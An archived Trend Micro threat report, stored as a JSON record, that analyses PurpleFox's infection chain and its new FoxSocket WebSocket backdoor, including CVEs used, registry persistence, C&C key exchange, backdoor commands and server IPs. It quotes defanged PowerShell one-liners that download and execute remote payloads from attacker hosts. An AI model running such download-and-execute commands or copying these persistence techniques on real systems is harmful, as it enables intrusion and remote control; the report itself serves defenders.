{
	"id": "6d9a6d18-cda8-42d3-902e-fa00e333638f",
	"created_at": "2026-04-10T03:21:15.555916Z",
	"updated_at": "2026-04-10T03:22:17.098866Z",
	"deleted_at": null,
	"sha1_hash": "ef2c11f4b7691e1641fb8d102693a19fdb8bc469",
	"title": "PurpleFox Adds New Backdoor That Uses WebSockets",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1315493,
	"plain_text": "PurpleFox Adds New Backdoor That Uses WebSockets\r\nBy Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy ( words)\r\nPublished: 2021-10-19 · Archived: 2026-04-10 02:19:27 UTC\r\nCyber Threats\r\nIn September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a\r\nPurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added\r\nvulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.\r\nBy: Abdelrhman Sharshar, Jay Yaneza, Sherif Magdy Oct 19, 2021 Read time: 9 min (2529 words)\r\n \r\nSave to Folio\r\nIn September 2021, the Trend Micro Managed XDR (MDR) team looked into suspicious activity related to a\r\nPurpleFox operator. Our findings led us to investigate an updated PurpleFox arsenal, which included an added\r\nvulnerability (CVE-2021-1732) and optimized rootkit capabilities leveraged in their attacks.\r\nWe also found a new backdoor written in .NET implanted during the intrusion, which we believe is highly\r\nassociated with PurpleFox. This backdoor, which we call FoxSocket, leverages WebSockets to communicate with\r\nits command-and-control (C\u0026C) servers, resulting in a more robust and secure means of communication\r\ncompared to regular HTTP traffic.\r\nWe believe that this particular threat is currently being aimed at users in the Middle East. We first encountered this\r\nthreat via customers in the region. We are currently investigating if it has been found in other parts of the world.\r\nIn this blog, we describe some of the observed modifications for the initial PurpleFox payloads, alongside the new\r\nimplanted .NET backdoor and the C2 infrastructure serving its functionality.\r\nPurpleFox Capabilities and Technical Analysis\r\nPowerShell\r\nThe activity starts with either of the following PowerShell commands being executed:\r\n\"cmd.exe\" /c powershell -nop -exec bypass -c \"IEX (New-Object\r\nNet.WebClient).DownloadString('hxxp[[:]]//103.228.112.246[[:]]17881/57BC9B7E.Png');MsiMake\r\nhxxp[[:]]//103.228.112.246[[:]]17881/0CFA042F.Png\"\r\n\"cmd.exe\" /c powershell -nop -exec bypass -c \"IEX (New-Object\r\nNet.WebClient).DownloadString('http[:]//117.187.136.141[:]13405/57BC9B7E.Png');MsiMake\r\nhttp[:]//117.187.136.141[:]13405/0CFA042F.Png\"\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 1 of 16\n\nThese commands download a malicious payload from the specified URLs, which are hosted on multiple\r\ncompromised servers. These servers are part of the PurpleFox botnet, with most of these located in China:\r\nTable 1. Location of PurpleFox servers\r\nCountry Server count\r\nChina 345\r\nIndia 34\r\nBrazil 29\r\nUnited States 26\r\nOthers 113\r\nThe fetched payload is a long script consisting of three components:\r\n1. Tater (Hot Potato – privilege escalation)\r\n2. PowerSploit\r\n3. Embedded exploit bundle binary (privilege escalation)\r\nThe script targets 64-bit architecture systems. It starts by checking the Windows version and applied hotfixes for\r\nthe vulnerabilities it is targeting.\r\nWindows 7/Windows Server 2008\r\nCVE-2020-1054 (KB4556836, KB4556843)\r\nCVE-2019-0808 (KB4489878, KB4489885, KB2882822)\r\nWindows 8/Windows Server 2012\r\nCVE-2019-1458 (KB4530702, KB4530730)\r\nWindows 10/Windows Server 2019\r\nCVE-2021-1732 (KB4601354, KB4601345, KB4601315, KB4601319)\r\nAfter selecting the appropriate vulnerability, it uses the PowerSploit module to reflectively load the embedded\r\nexploit bundle binary with the target vulnerability and an MSI command as arguments. As a failover, it uses the\r\nTater module to launch the MSI command.\r\nThe goal is to install the MSI package as an admin without any user interaction.\r\nMSI Package\r\nThe MSI package starts by removing the following registry keys, which are old Purple Fox installations if any are\r\npresent:\r\nHKLM\\SYSTEM\\CurrentControlSet\\Services\\{ac00-ac10}\r\nIt then installs the components (dbcode21mk.log and setupact64.log) of the Purple Fox backdoor to Windows\r\ndirectory. Afterward, it sets two registry values under the key\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 2 of 16\n\n“HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager”:\r\nAllowProtectedRenames to 0x1, and\r\nPendingFileRenameOperations to the following:\r\n\\??\\C:\\Windows\\AppPatch\\Acpsens.dll\r\n\\??\\C:\\Windows\\system32\\sens.dll\r\n\\??\\C:\\Windows\\AppPatch\\Acpsens.dll\r\n\\??\\C:\\Windows\\system32\\sens.dll\r\n\\??\\C:\\Windows\\setupact64.log\r\n\\??\\C:\\Windows\\system32\\sens.dll\r\nThese commands move sens.dll to C:\\Windows\\AppPatch\\Acpsens.dll and replace it with the installed file\r\nsetupact64.log.\r\nThe MSI package then runs a .vbs script that creates a Windows firewall rule to block incoming connections on\r\nports 135, 139, and 445. As a final step, the system is restarted to allow PendingFileRenameOperations to take\r\nplace, replacing sens.dll, which will make the malware run as the System Event Notification Service (SENS).\r\nPurpleFox Backdoor\r\nThe installed malware is a .dll file protected with VMProtect. Using the other data file installed by the MSI\r\npackage, it unpacks and manually loads different DLLs for its functionality. It also has a rootkit driver that is also\r\nunpacked from the data file and is used to hide its files, registry keys, and processes. The sample starts by copying\r\nitself to another file and installing a new service, then restoring the original sens.dll file. Afterward,  it loads the\r\ndriver to hide its files and registries and then spawns and injects a sequence of a 32-bit process to inject its code\r\nmodules into, as they are 32-bit DLLs.\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 3 of 16\n\nFigure 1. PurpleFox installation process\r\nWebSocket Backdoor\r\nInitial Delivery\r\nThe initial activity for retrieving this backdoor was captured three days after the previous PurpleFox intrusion\r\nattempts on the same compromised server. The Trend Micro Vision One™ platform flagged the following\r\nsuspicious PowerShell commands:\r\n\"cmd.exe\" /c powershell -c \"iex((new-object\r\nNet.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/1'))\"\r\n\"cmd.exe\" /c powershell -c \"iex((new-object\r\nNet.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/2'))\"\r\n\"cmd.exe\" /c powershell -c \"iex((new-object\r\nNet.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/3'))\"\r\n\"cmd.exe\" /c powershell -c \"iex((new-object\r\nNet.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/4'))\"\r\n\"cmd.exe\" /c powershell -c \"iex((new-object\r\nNet.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/5'))\"\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 4 of 16\n\n\"cmd.exe\" /c powershell -c \"iex((new-object\r\nNet.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/8'))\"\r\n\"cmd.exe\" /c powershell -c \"iex((new-object\r\nNet.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/9'))\"\r\nFigure 2. Trend Micro Vision One alert for PowerShell commands\r\nWe analyzed the payload hosted on the URLs, which were variations of 185[.]112.144.245/a/[1-9], and all were\r\nfound to be serving two variants of another PowerShell script that acts as the main downloader for the .NET\r\nbackdoor.\r\nFigure 3. Contents of payload\r\nThe difference between the two observed PowerShell scripts were in Base64-encoded data that was passed as an\r\nargument to the .NET sample downloaded from 185[.]112[.]144[.]45/a/data and finally invoked with this\r\nconfiguration parameter. We found two different configuration parameters used: We observed the first one on\r\nAugust 26 and the second one with more domains embedded on August 30. The decoded Base64-encoded\r\nconfiguration parameters are shown in the following figures:\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 5 of 16\n\nFigure 4. August 26 configuration\r\nFigure 5. August 30 configuration\r\nThese configuration parameters will be used by the .NET initialization routines to pick a C\u0026C server and initialize\r\ncryptographic functions for the C\u0026C channel. Aside from the configuration, the payload itself is retrieved from\r\n185.112.144[.]45/a/data. We also found some old variants that date back to June 22 that have fewer capabilities\r\nthan the more recent variants.\r\nDuring the earliest iterations for deploying this backdoor, aligning with the creation data of the malicious domain\r\nadvb9fyxlf2v[.]com, the configuration parameters had a minimal number of subdomains to contact the C\u0026C\r\nservers compared to the recent one.\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 6 of 16\n\nFigure 6. Backdoor configuration\r\n.NET Backdoor Obfuscation\r\nLet us start the analysis with the backdoor dropped on the SQL server. When decompiled,  it will output some\r\nobfuscated symbols, although most of these can’t be restored to the original. Merely making them to be human-readable is sufficient for basic static analysis. Sometimes, some of the original names can be restored.\r\nFigure 7. Cleaned classes and method names\r\nOne notable characteristic we rarely see in malware is leveraging WebSocket communication to the C\u0026C servers\r\nfor an efficient bidirectional channel between the infected client and the server.\r\nWebSocket is a communication technology that supports streams of data to be exchanged between a client and a\r\nserver over just a single TCP session. This is different from traditional request or response protocols like HTTP.\r\nThis gives the threat actor a more covert alternative to HTTP requests and responses traffic, which creates an\r\nopportunity for a more silent exfiltration with less likelihood of being detected.\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 7 of 16\n\nFigure 8. Traditional (left) and WebSocket techniques (right)\r\nIt initializes a WebSocket communication with its C\u0026C server and keeps it open by sending keepalive messages to\r\nmaintain the TCP connection. Once this is established, a series of bidirectional messages will be exchanged\r\nbetween the infected machine and the selected C\u0026C server to negotiate a session encryption key.\r\nFigure 9. TCP/IP exchanges between client and server\r\nThe execution starts by initializing the WebSocket and registering four callback functions as handlers for the\r\nWebSocket events.\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 8 of 16\n\nFigure 10. Function for registering callback functions\r\nOne of the relevant callbacks is onOpen, which will initialize the C\u0026C channel encryption parameters once the\r\nWebSocket object is fired for the first time. As shown in the next section, this is mainly for implementing the first\r\nDiffie-Hellman (DH) key exchange message with the C\u0026C server. On the other side, the onReceive handler will\r\nprocess and dispatch all the commands received from the server after a secure communication channel is\r\nestablished and when the session encryption key is updated.\r\nKey Negotiations\r\nThe first key exchange with the C\u0026C server is carried out by the onOpen callback registered function, as seen in\r\nFigure 11.\r\nFigure 11. onOpen function\r\nIt initializes the EC DH object with some parameters to start the shared secret key negotiation. The\r\n ECDiffieHellmanKeyDerivationFunction property is then set to Hash. This property is for specifying the key\r\nderivation function that the ECDiffieHellmanCng class will use to convert secret agreements into key material,\r\nso a hash algorithm is used to generate key material (instead of HMAC or TLS).\r\nAfterward, the client will try to send the property PublicKey, which will be used at the C\u0026C side on another\r\nECDiffieHellmanCng object to generate a shared secret agreement. Eventually, this data will be sent on the\r\nWebSocket as the first key exchange message. However, instead of sending it in cleartext, the client deploys a\r\nsymmetric AES encryption for any communication over the WebSocket for the first exchange, as no shared secret\r\nis established yet, and the AES encryption will generate a default key for this first exchange. \r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 9 of 16\n\nFigures 12-13. Function and code for the AES encryption key\r\nThis will result in the key negotiation message being encrypted with AES using the shown parameters and a\r\ndummy key generated (111….11)[32] named byte_0 in the following debugging session with the actual AES\r\ncipher text with a fixed length of 176 bytes. \r\nFigure 14. Structure of key exchange message\r\nThe 176 encrypted bytes are the actual data that will be sent over the WebSocket, which marks the end of the first\r\nkey exchange message.\r\nSecond Exchange (C\u0026C to Victim)\r\nThe second key exchange message is sent from the server to the client that will be handled by the onReceive\r\nfunction. The execution is invoked by the message handler. \r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 10 of 16\n\nFigure 15. Invoking the onReceive function\r\nThis AES-encrypted second exchange has a fixed length of 304 bytes.\r\nFigure 16. Contents of incoming message\r\nIt then checks if this incoming message is related to the control plane key establishment or just a normal data\r\ncommand.\r\nIf it is related to the former, the first step is to decrypt the symmetric encryption on the C2 channel then finalize\r\nthe shared secret generation by handing the execution to ECDH derivation function method_7.\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 11 of 16\n\nFigure 17. Handoff to method_7 function\r\nThe client will verify the signed message by loading the RSA public key loaded from the configuration payload\r\nshown in the previous section. If the signature is verified correctly, key material will be derived from the DH\r\nexchange and will be saved as the permanent symmetric AES encryption key (Symmetric_AES_key variable) that\r\nwill be used as long as the WebSocket channel is active.\r\nFigure 18. method_7 function\r\nThird Exchange (Victim to C\u0026C)\r\nOnce an efficient encrypted session is established over the WebSocket, the client will fingerprint the machine by\r\nextracting specific data (including the username, machine name, local IP, MAC address, and Windows version)\r\nand will relay such data over the secure channel to get the victim profiled at the server side, which is the final\r\nexchange before the WebSocket channel is fully established. It will then listen for further commands, which will\r\nbe covered in the next section.\r\nAs the fingerprinting data collected will be different from one execution environment to another, this message will\r\nvary in length. From our lab analysis, it was 240 bytes with the newly generated shared secret key.\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 12 of 16\n\nFigure 19. Newly generated secret key\r\nAs far as the WebSocket is maintained with the keepalive messages shown earlier, the operators can signal any\r\ncommand to be executed, so what happens next mainly depends on the targeting and the actual motivation of the\r\noperator.\r\nWebSocket Commands\r\nIn this section, we cover some of the observed commands sent from the server. There are some minor differences\r\nbetween variants across them with regard to the command numbers and the supported functionality.\r\nAll the handling of commands is implemented in the main dispatch routine (except for command 160, which is\r\nused for key negotiation or renegotiation).\r\nTable 2. List of commands\r\nCommand code Functionality\r\n20 Sends the current date on the victim machine\r\n30 Leaks DriveInfo.GetDrives() results info for all the drives \r\n40 Leaks DirectoryInfo() results info for a specific directory\r\n50 FileInfo()results info for a specific file\r\n60 Recursive directory search\r\n70 Executes WMI queries - ManagementObjectSearcher()\r\n80 Closes the WebSocket Session\r\n90 Exits the process\r\n100 Spawns a new process\r\n110 Downloads more data from a specific URL to the victim machine\r\n120 DNS lookup from the victim machine\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 13 of 16\n\n130 Leaks specific file contents from the victim machine\r\n140 Writes new content to a specific location\r\n150 Downloads data then write to a specific file\r\n160 Renegotiates session key for symmetric encryption\r\n180 Gets current process ID/Name\r\n210 Returns the configuration parameter for the backdoor\r\n220 Kills the process then start the new process with a different config\r\n230 Kills specific process with PID\r\n240 Queries internal backdoor object properties\r\n260 Leaks hashes of some specific files requested\r\n270 Kills list of PIDs\r\n280 Deletes list of files/directories requested\r\n290 Moves list of files/directories to another location\r\n300 Creates new directory to a specific location\r\nWebSocket C\u0026C Infrastructure\r\nAt the time of this writing, there were several active C\u0026C servers controlling the WebSocket clients. By profiling\r\nthe infected targets and interacting through different commands sent, we listed the observed IP addresses and the\r\nregistered domains found in the PowerShell downloaders and the backdoor configuration parameters.\r\nTable 3. WebSocket C\u0026C serversIP address Description ASN Notable activity\r\nIP address  Description  ASN Notable activity\r\n185.112.144.245\r\n(Hosting PS payloads, /a/[1-\r\n9])\r\n(Hosting .Net Payload,\r\n/a/data)\r\nAS 44925 ( 1984 ehf\r\n)\r\nIraq, Saudi Arabia, Turkey,\r\nUAE\r\n185.112.147.50 C\u0026C server Turkey, US, UAE\r\n185.112.144.101 Turkey\r\n93.95.226.157 US\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 14 of 16\n\n93.95.228.163 US\r\n93.95.227.183 -\r\n93.95.227.169 UAE\r\n93.95.227.179 -\r\n185.112.146.72\r\nPotential C\u0026C server\r\n-\r\n185.112.146.83 -\r\nThe backdoor picks one subdomain randomly from the configuration data and tries to connect via WebSockets. If\r\nit fails to connect on port 12345, it will try to resolve another subdomain.\r\nFigure 20. Random C\u0026C servers\r\nThe main domain advb9fyxlf2v[.]com used by these servers — registered on June 17, 2021, just within days of the\r\nfirst observed variant — is mainly for load balancing across the multiple active servers.\r\nConclusion\r\nThe rootkit capabilities of PurpleFox make it more capable of carrying out its objectives in a stealthier manner.\r\n They allow PurpleFox to persist on affected systems as well as deliver further payloads to affected systems. We\r\nare still monitoring these new variants and their dropped payloads. The new .NET WebSocket backdoor (called\r\nFoxSocket, which we detect as Backdoor.MSIL.PURPLEFOX.AA) is being closely monitored to discover any\r\nmore information about this threat actor’s intentions and objectives.\r\nTrend Micro Solutions and Indicators of Compromise\r\nThe capabilities of the Trend Micro Vision One platform made both the detection of this attack and our\r\ninvestigation into it possible. We took into account metrics from the network and endpoints that would indicate\r\npotential attempts of exploitation. The Trend Micro Vision One Workbench shows a holistic view of the activities\r\nthat are observed in a user’s environment by highlighting important attributes related to the attack.\r\nTrend Micro Managed XDR offers expert threat monitoring, correlation, and analysis from experienced\r\ncybersecurity industry veterans, providing 24/7 service that allows organizations to have one single source of\r\ndetection, analysis, and response. This service is enhanced by solutions that combine AI and Trend Micro’s wealth\r\nof global threat intelligence. \r\nAll IOCs related to this attack can be found in this separate file.\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 15 of 16\n\nTags\r\nSource: https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nhttps://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html"
	],
	"report_names": [
		"purplefox-adds-new-backdoor-that-uses-websockets.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775791275,
	"ts_updated_at": 1775791337,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/ef2c11f4b7691e1641fb8d102693a19fdb8bc469.pdf",
		"text": "https://archive.orkl.eu/ef2c11f4b7691e1641fb8d102693a19fdb8bc469.txt",
		"img": "https://archive.orkl.eu/ef2c11f4b7691e1641fb8d102693a19fdb8bc469.jpg"
	}
}